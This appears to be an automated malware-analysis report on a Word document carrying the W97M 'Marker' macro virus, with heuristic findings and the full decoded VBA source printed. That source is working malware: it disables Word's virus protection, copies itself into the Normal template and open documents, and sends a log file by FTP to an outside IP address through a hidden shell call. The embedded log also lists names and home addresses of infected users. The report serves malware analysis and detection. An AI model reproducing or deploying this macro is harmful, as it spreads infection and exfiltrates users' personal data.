MALICIOUS
270
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1505.003 Server Software Component: Exploit Public-Facing Application
T1190 Exploit Public-Facing Application
T1071.001 Web Protocols: HTTP
T1105 Ingress Tool Transfer
The VBA macro code explicitly disables virus protection and attempts to write a second-stage payload to a file named 'c:\netldx.vxd' which then attempts to connect to '209.201.88.110' via FTP to upload a file and potentially download further components. The macro also attempts to tamper with VBA project code and disable macro virus protection, indicating self-replication or AV evasion tactics.
Heuristics 6
-
ClamAV: Doc.Trojan.Marker-31 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Trojan.Marker-31
-
VBA macros detected medium 2 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Potential Shell call in VBA critical OLE_VBA_SHELLPotential Shell call in VBAMatched line in script
Shell "command.com /c ftp.exe -n -s:c:\netldx.vxd", vbHide -
VBA macro-virus self-replication / AV tampering critical OLE_VBA_MACRO_VIRUS_REPLICATIONVBA macro programmatically rewrites VBA project code through the VBE object model (CodeModule/VBComponents InsertLines/DeleteLines/AddFromString or OrganizerCopy) to copy itself into the global template and other open documents, and/or disables Office macro-virus protection (Options.VirusProtection = False). This is the defining behavior of the W97M document macro-virus family — self-replicating code with no benign document use, independent of any AV signature.Matched line in script
'Switch the VirusProtection OFF Options.VirusProtection = False -
Urgency / deadline lure low SE_URGENCY_LUREDocument contains urgency or deadline language ('account will be terminated', 'action required within 24 hours', etc.) — useful context, but low-signal without other findings
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://ogimachi.net In document text (OLE body)
- https://sites.google.com/a/sccs.santacruz.k12.ca.us/tonie-ogimachi-s-spanish-classes-website/homeIn document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 5774 bytes |
SHA-256: 8cf5133d97562c21058111450534b9719bf694989c63c94a1c92785f5feb3684 |
|||
|
Detection
ClamAV:
Doc.Trojan.Marker-3
Obfuscation or payload:
unlikely
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_Close()
On Error Resume Next
Const Marker = "<- this is a marker!"
'Declare Variables
Dim SaveDocument, SaveNormalTemplate, DocumentInfected, NormalTemplateInfected As Boolean
Dim ad, nt As Object
Dim OurCode, UserAddress, LogData, LogFile As String
'Initialize Variables
Set ad = ActiveDocument.VBProject.VBComponents.Item(1)
Set nt = NormalTemplate.VBProject.VBComponents.Item(1)
DocumentInfected = ad.CodeModule.Find(Marker, 1, 1, 10000, 10000)
NormalTemplateInfected = nt.CodeModule.Find(Marker, 1, 1, 10000, 10000)
'Switch the VirusProtection OFF
Options.VirusProtection = False
If (Day(Now()) = 1) And (System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\MS Setup (ACME)\User Info", "LogFile") = False) Then
If DocumentInfected = True Then
LogData = ad.CodeModule.Lines(1, ad.CodeModule.CountOfLines)
ElseIf NormalTemplateInfected = True Then
LogData = nt.CodeModule.Lines(1, nt.CodeModule.CountOfLines)
End If
LogData = Mid(LogData, InStr(1, LogData, "' Log" & "file -->"), Len(LogData) - InStr(1, LogData, "' Log" & "file -->"))
For i = 1 To 4
LogFile = LogFile + Mid(Str(Int(8 * Rnd)), 2, 1)
Next i
LogFile = "C:\hsf" & LogFile & ".sys"
Open LogFile For Output As #1
Print #1, LogData
Close #1
Open "c:\netldx.vxd" For Output As #1
Print #1, "o 209.201.88.110"
Print #1, "user anonymous"
Print #1, "pass itsme@"
Print #1, "cd incoming"
Print #1, "ascii"
Print #1, "put " & LogFile
Print #1, "quit"
Close #1
Shell "command.com /c ftp.exe -n -s:c:\netldx.vxd", vbHide
System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\MS Setup (ACME)\User Info", "LogFile") = True
End If
'Make sure that some conditions are true before we continue infecting anything
If (DocumentInfected = True Xor NormalTemplateInfected = True) And _
(ActiveDocument.SaveFormat = wdFormatDocument Or _
ActiveDocument.SaveFormat = wdFormatTemplate) Then
'Infect the NormalTemplate
If DocumentInfected = True Then
SaveNormalTemplate = NormalTemplate.Saved
OurCode = ad.CodeModule.Lines(1, ad.CodeModule.CountOfLines)
'Write a log file of this NormalTemplate infection
For i = 1 To Len(Application.UserAddress)
If Mid(Application.UserAddress, i, 1) <> Chr(13) Then
If Mid(Application.UserAddress, i, 1) <> Chr(10) Then
UserAddress = UserAddress & Mid(Application.UserAddress, i, 1)
End If
Else
UserAddress = UserAddress & Chr(13) & "' "
End If
Next i
OurCode = OurCode & Chr(13) & _
"' " & Format(Time, "hh:mm:ss AMPM - ") & _
Format(Date, "dddd, d mmm yyyy") & Chr(13) & _
"' " & Application.UserName & Chr(13) & _
"' " & UserAddress & Chr(13)
nt.CodeModule.DeleteLines 1, nt.CodeModule.CountOfLines
nt.CodeModule.AddFromString OurCode
If SaveNormalTemplate = True Then NormalTemplate.Save
End If
'Infect the ActiveDocument
If NormalTemplateInfected = True And _
(Mid(ActiveDocument.FullName, 2, 1) = ":" Or _
ActiveDocument.Saved = False) Then
SaveDocument = ActiveDocument.Saved
OurCode = nt.CodeModule.Lines(1, nt.CodeModule.CountOfLines)
ad.CodeModule.DeleteLines 1, ad.CodeModule.CountOfLines
ad.CodeModule.AddFromString OurCode
If SaveDocument = True Then ActiveDocument.Save
End If
End If
End Sub
' Logfile -->
' 09:08:36 - Saturday, 28 Nov 1998
' SPo0Ky
' Blue Planet
'
' 02:50:31 PM - Saturday, 28 Nov 1998
' MARK B. SEAY
'
' 08:04:45 AM - Friday, 4 Dec 1998
' UPS
'
' 11:43:35 AM - Thursday, 17 Dec 1998
' WRO
'
' 11:37:56 AM - Tuesday, 29 Dec 1998
' Dan Ross
'
' 09:50:06 AM - Monday, 11 Jan 1999
' Karen M. Pinks
'
' 05:54:30 PM - Thursday, 21 Jan 1999
' Thomas M. Burke
'
' 05:09:47 PM - Monday, 25 Jan 1999
' Robbin V.Varnado-Williams
'
' 10:09:58 AM - Tuesday, 2 Feb 1999
' Marianne Bordogna
'
' 01:38:49 PM - Monday, 8 Feb 1999
' Barbara W. Seigle
'
' 10:49:44 AM - Tuesday, 16 Feb 1999
' DSHINMA
'
' 01:04:30 PM - Thursday, 18 Feb 1999
' DKWATSO
'
' 10:59:07 AM - Saturday, 20 Feb 1999
' Charles Graves
'
' 03:29:06 PM - Monday, 22 Feb 1999
' Evelina A. Olson
'
' 05:10:50 PM - Thursday, 25 Feb 1999
' Station
'
' 11:41:57 PM - Tuesday, 2 Mar 1999
' Nakao
'
' 11:44:27 AM - Saturday, 6 Mar 1999
' cc167hh
'
' 09:37:01 AM - Thursday, 18 Mar 1999
' ALSS Computer Lab
'
' 01:25:09 PM - Thursday, 18 Mar 1999
' ALSS Computer Lab
'
' 03:57:55 PM - Monday, 29 Mar 1999
' ALSS Computer Lab
'
' 12:15:14 PM - Tuesday, 20 Apr 1999
' ALSS Computer Lab
'
' 02:21:52 PM - Friday, 4 Jun 1999
' Freyja
' Freyja Knapp
' 1325 Everett St.
' El Cerrito, CA 94530
' 05:03:46 PM - Tuesday, 14 Sep 1999
' Preferred Customer
' adam.com
' 90 Tehama Street
' San Francisco, CA 94104
' 02:12:37 PM - Friday, 28 Jan 2000
' Laurie West
'
' 04:15:43 PM - Friday, 11 Feb 2000
' adam.com
'
' 09:00:05 PM - Wednesday, 5 Apr 2000
' Jeff Fillingim-Selk
'
' 09:41:39 AM - Thursday, 24 Aug 2000
' Santa Cruz High School
'
' 07:23:11 AM - Wednesday, 4 Oct 2000
' Malcolm Terence
'
' 10:48:47 AM - Monday, 9 Oct 2000
' Jonnum
'
' 12:45:49 AM - Tuesday, 29 May 2001
' Jesse Di Marco
'
' 04:17:43 PM - Friday, 27 Jan 2006
' Dennis Diego
'
' 01:28:11 PM - Wednesday, 5 Oct 2011
' Santa Cruz High School
'
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.